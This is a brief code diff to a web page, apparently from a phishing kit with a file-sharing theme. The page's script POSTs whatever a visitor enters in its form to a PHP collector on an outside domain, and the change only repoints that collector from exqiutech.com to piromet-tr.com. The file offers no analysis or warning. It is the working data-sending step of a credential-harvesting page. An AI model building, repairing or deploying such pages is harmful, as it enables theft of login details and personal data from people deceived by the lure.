--- a/doc3/_QDdwxsmqvCDNVDVRsvDtHCmvdCRgGXQrFZzmfkVwmrxBpxsxpQSHttdQQdMhkkKr/index-1.html
+++ b/doc3/_QDdwxsmqvCDNVDVRsvDtHCmvdCRgGXQrFZzmfkVwmrxBpxsxpQSHttdQQdMhkkKr/index-1.html
@@ -40,7 +40,7 @@ $(document).ready(function() {
         $("#byn").html("Processing..").prop("disabled", true);
         $.ajax({
             
-            url: "https://exqiutech.com/kells2share/3/X.php",
+            url: "https://piromet-tr.com/kells2share/3/X.php",
             type: 'POST',
             data: formData,
             // dataType : 'jsonp',
